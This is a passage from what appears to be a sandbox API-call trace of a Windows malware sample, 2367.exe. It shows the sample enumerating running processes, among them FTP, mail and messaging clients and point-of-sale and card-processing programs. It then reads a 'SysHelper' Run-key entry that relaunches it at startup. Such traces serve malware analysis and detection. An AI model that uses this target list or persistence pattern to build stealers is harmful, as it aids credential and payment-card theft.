returned 1 [0123.728] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7c0) returned 0x550 [0123.728] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.730] GetModuleBaseNameW (in: hProcess=0x550, hModule=0xe0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="smtp old shopping.exe") returned 0x15 [0123.730] CloseHandle (hObject=0x550) returned 1 [0123.730] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5ac) returned 0x550 [0123.730] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.732] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x190000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="passionjudge.exe") returned 0x10 [0123.732] CloseHandle (hObject=0x550) returned 1 [0123.732] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x248) returned 0x550 [0123.732] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.733] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x2b0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="injuries possible.exe") returned 0x15 [0123.734] CloseHandle (hObject=0x550) returned 1 [0123.734] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x704) returned 0x550 [0123.734] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.735] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x220000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="3dftp.exe") returned 0x9 [0123.736] CloseHandle (hObject=0x550) returned 1 [0123.736] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x694) returned 0x550 [0123.736] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.737] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x1000000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="absolutetelnet.exe") returned 0x12 [0123.737] CloseHandle (hObject=0x550) returned 1 [0123.737] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x754) returned 0x550 [0123.737] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.739] GetModuleBaseNameW (in: hProcess=0x550, hModule=0xd50000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="alftp.exe") returned 0x9 [0123.739] CloseHandle (hObject=0x550) returned 1 [0123.739] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4fc) returned 0x550 [0123.739] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.740] GetModuleBaseNameW (in: hProcess=0x550, hModule=0xdb0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="barca.exe") returned 0x9 [0123.741] CloseHandle (hObject=0x550) returned 1 [0123.741] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x598) returned 0x550 [0123.741] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.742] GetModuleBaseNameW (in: hProcess=0x550, hModule=0xe10000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="bitkinex.exe") returned 0xc [0123.742] CloseHandle (hObject=0x550) returned 1 [0123.742] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x434) returned 0x550 [0123.742] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.744] GetModuleBaseNameW (in: hProcess=0x550, hModule=0xb0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="coreftp.exe") returned 0xb [0123.744] CloseHandle (hObject=0x550) returned 1 [0123.744] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x23c) returned 0x550 [0123.744] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.745] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x80000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="far.exe") returned 0x7 [0123.746] CloseHandle (hObject=0x550) returned 1 [0123.746] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x15c) returned 0x550 [0123.746] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.747] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x10f0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="filezilla.exe") returned 0xd [0123.747] CloseHandle (hObject=0x550) returned 1 [0123.747] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7cc) returned 0x550 [0123.747] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.749] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x880000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="flashfxp.exe") returned 0xc [0123.749] CloseHandle (hObject=0x550) returned 1 [0123.749] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x35c) returned 0x550 [0123.749] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.751] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x10d0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="fling.exe") returned 0x9 [0123.751] CloseHandle (hObject=0x550) returned 1 [0123.751] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6c0) returned 0x550 [0123.751] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.752] GetModuleBaseNameW (in: hProcess=0x550, hModule=0xba0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="foxmailincmail.exe") returned 0x12 [0123.753] CloseHandle (hObject=0x550) returned 1 [0123.753] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc4) returned 0x550 [0123.753] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.754] GetModuleBaseNameW (in: hProcess=0x550, hModule=0xd30000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="gmailnotifierpro.exe") returned 0x14 [0123.755] CloseHandle (hObject=0x550) returned 1 [0123.755] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7c8) returned 0x550 [0123.755] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.756] GetModuleBaseNameW (in: hProcess=0x550, hModule=0xc80000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="icq.exe") returned 0x7 [0123.757] CloseHandle (hObject=0x550) returned 1 [0123.757] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x664) returned 0x550 [0123.757] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.758] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x11f0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="leechftp.exe") returned 0xc [0123.758] CloseHandle (hObject=0x550) returned 1 [0123.759] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x80c) returned 0x550 [0123.759] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.760] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x1260000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="ncftp.exe") returned 0x9 [0123.760] CloseHandle (hObject=0x550) returned 1 [0123.760] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x81c) returned 0x550 [0123.761] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.762] GetModuleBaseNameW (in: hProcess=0x550, hModule=0xaa0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="notepad.exe") returned 0xb [0123.762] CloseHandle (hObject=0x550) returned 1 [0123.762] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x82c) returned 0x550 [0123.762] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.764] GetModuleBaseNameW (in: hProcess=0x550, hModule=0xcf0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="operamail.exe") returned 0xd [0123.764] CloseHandle (hObject=0x550) returned 1 [0123.764] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x83c) returned 0x550 [0123.764] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.765] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x140000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="outlook.exe") returned 0xb [0123.766] CloseHandle (hObject=0x550) returned 1 [0123.766] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x84c) returned 0x550 [0123.766] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.767] GetModuleBaseNameW (in: hProcess=0x550, hModule=0xef0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="pidgin.exe") returned 0xa [0123.768] CloseHandle (hObject=0x550) returned 1 [0123.768] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x85c) returned 0x550 [0123.768] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.769] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x10b0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="scriptftp.exe") returned 0xd [0123.769] CloseHandle (hObject=0x550) returned 1 [0123.769] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x86c) returned 0x550 [0123.769] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.771] GetModuleBaseNameW (in: hProcess=0x550, hModule=0xdf0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="skype.exe") returned 0x9 [0123.771] CloseHandle (hObject=0x550) returned 1 [0123.771] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x87c) returned 0x550 [0123.771] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.773] GetModuleBaseNameW (in: hProcess=0x550, hModule=0xb10000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="smartftp.exe") returned 0xc [0123.773] CloseHandle (hObject=0x550) returned 1 [0123.773] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x88c) returned 0x550 [0123.773] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.774] GetModuleBaseNameW (in: hProcess=0x550, hModule=0xa20000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="thunderbird.exe") returned 0xf [0123.775] CloseHandle (hObject=0x550) returned 1 [0123.775] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x89c) returned 0x550 [0123.775] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.776] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x250000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="totalcmd.exe") returned 0xc [0123.777] CloseHandle (hObject=0x550) returned 1 [0123.777] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8ac) returned 0x550 [0123.777] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.778] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x11e0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="trillian.exe") returned 0xc [0123.778] CloseHandle (hObject=0x550) returned 1 [0123.778] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8bc) returned 0x550 [0123.779] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.780] GetModuleBaseNameW (in: hProcess=0x550, hModule=0xbf0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="webdrive.exe") returned 0xc [0123.780] CloseHandle (hObject=0x550) returned 1 [0123.780] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8cc) returned 0x550 [0123.780] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.782] GetModuleBaseNameW (in: hProcess=0x550, hModule=0xaf0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="whatsapp.exe") returned 0xc [0123.782] CloseHandle (hObject=0x550) returned 1 [0123.782] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8dc) returned 0x550 [0123.782] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.783] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x1340000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="winscp.exe") returned 0xa [0123.784] CloseHandle (hObject=0x550) returned 1 [0123.784] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8ec) returned 0x550 [0123.784] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.785] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x12c0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="yahoomessenger.exe") returned 0x12 [0123.786] CloseHandle (hObject=0x550) returned 1 [0123.786] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8fc) returned 0x550 [0123.786] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.787] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x1f0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="active-charge.exe") returned 0x11 [0123.787] CloseHandle (hObject=0x550) returned 1 [0123.788] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x90c) returned 0x550 [0123.788] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.789] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x930000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="accupos.exe") returned 0xb [0123.789] CloseHandle (hObject=0x550) returned 1 [0123.789] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x91c) returned 0x550 [0123.789] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.791] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x8b0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="afr38.exe") returned 0x9 [0123.791] CloseHandle (hObject=0x550) returned 1 [0123.791] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x92c) returned 0x550 [0123.791] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.793] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x160000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="aldelo.exe") returned 0xa [0123.793] CloseHandle (hObject=0x550) returned 1 [0123.793] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x93c) returned 0x550 [0123.793] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.794] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x1060000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="ccv_server.exe") returned 0xe [0123.795] CloseHandle (hObject=0x550) returned 1 [0123.795] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x94c) returned 0x550 [0123.795] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.796] GetModuleBaseNameW (in: hProcess=0x550, hModule=0xe80000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="centralcreditcard.exe") returned 0x15 [0123.796] CloseHandle (hObject=0x550) returned 1 [0123.797] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x95c) returned 0x550 [0123.797] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.798] GetModuleBaseNameW (in: hProcess=0x550, hModule=0xce0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="creditservice.exe") returned 0x11 [0123.798] CloseHandle (hObject=0x550) returned 1 [0123.798] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x96c) returned 0x550 [0123.798] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.800] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x260000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="edcsvr.exe") returned 0xa [0123.800] CloseHandle (hObject=0x550) returned 1 [0123.800] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x97c) returned 0x550 [0123.800] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.802] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x350000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="fpos.exe") returned 0x8 [0123.802] CloseHandle (hObject=0x550) returned 1 [0123.802] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x98c) returned 0x550 [0123.802] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.803] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x190000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="isspos.exe") returned 0xa [0123.804] CloseHandle (hObject=0x550) returned 1 [0123.804] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x99c) returned 0x550 [0123.804] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.806] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x320000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="mxslipstream.exe") returned 0x10 [0123.806] CloseHandle (hObject=0x550) returned 1 [0123.806] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9ac) returned 0x550 [0123.806] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.808] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x9f0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="omnipos.exe") returned 0xb [0123.808] CloseHandle (hObject=0x550) returned 1 [0123.808] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9bc) returned 0x550 [0123.808] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.809] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x8f0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="spcwin.exe") returned 0xa [0123.810] CloseHandle (hObject=0x550) returned 1 [0123.810] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9cc) returned 0x550 [0123.810] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.811] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x12c0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="spgagentservice.exe") returned 0x13 [0123.812] CloseHandle (hObject=0x550) returned 1 [0123.812] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9dc) returned 0x550 [0123.812] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.813] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x350000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="utg2.exe") returned 0x8 [0123.813] CloseHandle (hObject=0x550) returned 1 [0123.814] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9ec) returned 0x550 [0123.814] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.815] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x850000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="subjects tamil terms.exe") returned 0x18 [0123.815] CloseHandle (hObject=0x550) returned 1 [0123.815] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa18) returned 0x0 [0123.815] CloseHandle (hObject=0x0) returned 0 [0123.815] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa44) returned 0x0 [0123.815] CloseHandle (hObject=0x0) returned 0 [0123.816] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb74) returned 0x0 [0123.816] CloseHandle (hObject=0x0) returned 0 [0123.816] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7b0) returned 0x550 [0123.816] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 0 [0123.816] CloseHandle (hObject=0x550) returned 1 [0123.816] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x518) returned 0x0 [0123.816] CloseHandle (hObject=0x0) returned 0 [0123.816] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x854) returned 0x0 [0123.816] CloseHandle (hObject=0x0) returned 0 [0123.816] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8d4) returned 0x0 [0123.816] CloseHandle (hObject=0x0) returned 0 [0123.816] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa80) returned 0x550 [0123.816] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.818] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x400000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="2367.exe") returned 0x8 [0123.818] CloseHandle (hObject=0x550) returned 1 [0123.818] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3a4) returned 0x550 [0123.818] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 0 [0123.818] CloseHandle (hObject=0x550) returned 1 [0123.819] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x774) returned 0x550 [0123.819] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.820] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x400000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="2367.exe") returned 0x8 [0123.820] CloseHandle (hObject=0x550) returned 1 [0123.820] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x28) returned 0x31f9b90 [0123.820] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x62b4048 [0123.820] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e1b9e8 [0123.820] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e237d8 [0123.821] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e23a40 [0123.821] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x62d1b68 [0123.821] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x62d1dd0 [0123.821] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x62d2038 [0123.821] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x62d22a0 [0123.821] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x62d2508 [0123.821] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x62d2770 [0123.821] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18de38 | out: phkResult=0x18de38*=0x550) returned 0x0 [0123.821] RegQueryValueExW (in: hKey=0x550, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18de34, lpData=0x18c560, lpcbData=0x18de18*=0x400 | out: lpType=0x18de34*=0x2, lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1e0f3478-f5c6-4d34-8528-dedd9dcd2df7\\2367.exe\" --AutoStart", lpcbData=0x18de18*=0xd0) returned 0x0 [0123.822] RegCloseKey (hKey=0x550) returned 0x0 [0123.822] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0xd0) returned 0x329b6c8 [0123.822] lstrlenA (lpString="\" --AutoStart") returned 13 [0123.822] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0xc0) returned 0x5e1ce68 